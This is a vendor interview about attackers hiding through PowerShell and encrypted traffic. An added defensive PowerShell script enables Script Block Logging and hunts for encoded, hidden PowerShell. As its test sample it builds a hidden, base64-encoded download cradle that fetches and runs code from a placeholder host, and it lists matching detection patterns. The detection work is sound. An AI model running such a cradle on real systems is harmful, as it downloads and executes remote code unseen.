"What are the advanced attackers hiding?"
Chris Bates, Principal Architect, SentinelOne
In preparation for the 2018 CAMSS BC conference, we caught up with Chris Bates, Principal Architect at SentinelOne, to gain some insight into his session, "What are the advanced attackers hiding?".
1. Advanced attackers are always looking for ways to stay hidden. What simple methods are they using to hide their threats and communication channels?
Attackers are starting to leverage tools and systems already in the environment to launch attacks and stay hidden. A simple example is Microsoft PowerShell, a tool that is installed on every Windows machine. This tool allows an attacker to compromise a system without having to use malware. They also use encrypted TLS channels over port 443 or short DNS names to further hide the compromise.
2. Can you explain some of the threats lurking inside encrypted traffic at the endpoint?
Over 50% of the web traffic today is HTTPS / TLS. Since most tools can't see inside it, how does an organization know whether the data going to Box, OneDrive or GitHub is something that should normally happen or an attacker stealing data? Another common theme is to compromise encrypted ad networks on popular sites and use them to deliver what is known as "drive-by" malware.
3. In what ways are companies now able to both detect and respond to formerly "unseeable" threats?
Detecting and responding to "unseeable" threats is really done one of two ways. The first is to prevent the attack surface altogether. An example of this is Script Control or Application Whitelisting. While this way does increase security, it comes with a high overhead cost in terms of maintenance and impact on end users and business processes.
The second approach is about visibility. If I can now see the "unseeable" threat, then I can deal with it. To this end, tools are starting to break or see inside encrypted traffic, in the case of TLS. This approach offers more in the way of dynamic protection without high overhead or business-impacting costs.
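The living-off-the-land PowerShell tradecraft described in the first answer, and the "visibility" approach described in the answer above, as an added example that is not part of the interview and not SentinelOne's product or code: it turns on Windows' built-in Script Block Logging and then hunts the resulting events for base64-encoded commands, hidden windows and in-memory download cradles, decoding any encoded payload it finds. The registry path and event ID are Microsoft's; the indicator patterns, the decoding regex and the sample script line are this example's own assumptions.

```powershell
# Added example, not from the interview or SentinelOne: gain visibility into
# PowerShell "living off the land" with Windows' own Script Block Logging.
# Run from an elevated PowerShell 5.1+ prompt (the registry write needs admin).

# 1. Enable Script Block Logging (the same setting as the Group Policy
#    "Turn on PowerShell Script Block Logging"). Registry path and value are Microsoft's.
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
New-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -PropertyType DWord -Force | Out-Null

# 2. Indicators of the tradecraft the interview describes. These patterns are
#    assumptions for this example, not a vendor signature set.
$indicators = [ordered]@{
    EncodedCommand   = '-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{16,}'   # hidden command line
    Base64Decode     = 'FromBase64String'                                      # decode in memory
    InvokeExpression = '\bIEX\b|Invoke-Expression'                             # run whatever was decoded
    DownloadCradle   = 'DownloadString|Net\.WebClient|Invoke-WebRequest'        # fetch over HTTPS/443
    HiddenWindow     = '-(?:w|windowstyle)\s+hidden'                           # keep the user from noticing
}

function Find-HiddenPowerShell {
    # Matches one script block's text against the indicators and, where an
    # -EncodedCommand payload is present, decodes it (UTF-16LE base64) so the
    # hidden command is readable. Returns one object per script block.
    param([Parameter(Mandatory)][string]$ScriptText, [datetime]$When = (Get-Date))
    $hits = @(foreach ($name in $indicators.Keys) {
        if ($ScriptText -match $indicators[$name]) { $name }
    })
    $decoded = $null
    if ($ScriptText -match '-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})') {
        try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { $decoded = '<not valid base64>' }
    }
    [pscustomobject]@{
        TimeCreated = $When
        Indicators  = $hits
        Decoded     = $decoded
        Snippet     = $ScriptText.Substring(0, [Math]::Min(120, $ScriptText.Length))
    }
}

# 3. Constructed sample (not from a real incident): a script that spawns a hidden,
#    base64-encoded PowerShell whose payload is an HTTPS download cradle.
$payload = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/u')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sample  = "Start-Process powershell.exe -ArgumentList '-NoP -W Hidden -Enc $b64'"
Find-HiddenPowerShell -ScriptText $sample | Format-List
# Expect Indicators EncodedCommand and HiddenWindow, and Decoded showing the IEX ... DownloadString line.

# 4. Hunt the live log. Event 4104 carries the script text as PowerShell ran it
#    (Properties[2] is ScriptBlockText), so obfuscation inside a script is already
#    undone here; the base64 of an outer "powershell -enc" launch is instead visible
#    in 4688 process-creation events when command-line auditing is on.
$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddDays(-1)
} -ErrorAction SilentlyContinue

$events |
    ForEach-Object { Find-HiddenPowerShell -ScriptText $_.Properties[2].Value -When $_.TimeCreated } |
    Where-Object { $_.Indicators.Count -gt 0 } |
    Sort-Object TimeCreated -Descending |
    Format-Table TimeCreated, @{n='Indicators';e={$_.Indicators -join ','}}, Decoded, Snippet -Wrap
```

Script Block Logging is the cheap end of the visibility approach: it costs no business-process change, but it only records what PowerShell itself executes, so a script that launches another encoded PowerShell instance surfaces here as the launching line, not the launched one. Pair it with process-creation auditing (event 4688 with command-line logging) to see both, and treat the indicator list as a starting point to tune against your own environment's legitimate automation.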
4. What dangers do companies face by ignoring these threats, both now and in the future? How can the problems escalate?
Breaches, regardless of whether they are insider-threat based or from a malicious outsider, continue to cause damage the longer they are "alive" in the environment. If a company doesn't have the skills and tools to find the hidden actors, then the damage continues until they are informed, usually by a third party. Once informed of a breach, the company then has to pay high-priced teams to come in, uncover the hidden threat and expel it. In short, history has shown breaches are always cheaper to deal with proactively, before they happen, than reactively.
5. How is SentinelOne positioned to assist?
The autonomous SentinelOne endpoint platform has complete visibility into the places attackers like to try to exploit and hide. The platform uses this visibility to automatically stop the attackers as they try to gain a foothold in the environment regardless of how they try to hide.
6. At the forthcoming CAMSS B.C. conference in Vancouver, you will be leading a session on this very topic. What do you ultimately want the participants to take away from the discussion?
Attackers are moving away from common malware and moving to attacks that "live off the land" and exploit tools and systems already in place. Companies need to have and execute on a plan to deal with this emerging attack surface.